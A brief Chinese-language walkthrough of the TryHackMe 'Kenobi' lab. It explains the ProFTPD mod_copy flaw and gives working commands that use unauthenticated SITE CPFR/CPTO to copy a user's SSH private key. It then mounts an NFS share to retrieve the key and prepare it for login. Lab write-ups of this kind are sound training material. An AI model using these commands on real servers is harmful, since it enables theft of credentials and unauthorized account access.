ProFtpd是一个免费、开源的FTP服务器,兼容Unix和Windows系统。它在过去的软件版本中也存在漏洞。
漏洞原理:
ProFtpd 的漏洞mod_copy 模块。
mod_copy 模块实现SITE CPFR 和 SITE CPTO命令,可用于将文件/目录从服务器上的一个位置复制到另一个位置。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何 部分复制到选定的目的地。
靶机:tryhackme Kenobi
nc MACHINE_IP 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
接下来将 /var/tmp 目录挂载到我们的机器上
mkdir /mnt/kenobiNFS
mount MACHINE_IP:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
直接去 /var/tmp 并获取私钥然后登录到 Kenobi 的账户
cp /mnt/kenobiNFS/tmp/id_rsa . //拷贝id_rsa到根目录
sudo chmod 600 id_rsa //赋予id_rsa文件可以读写的权限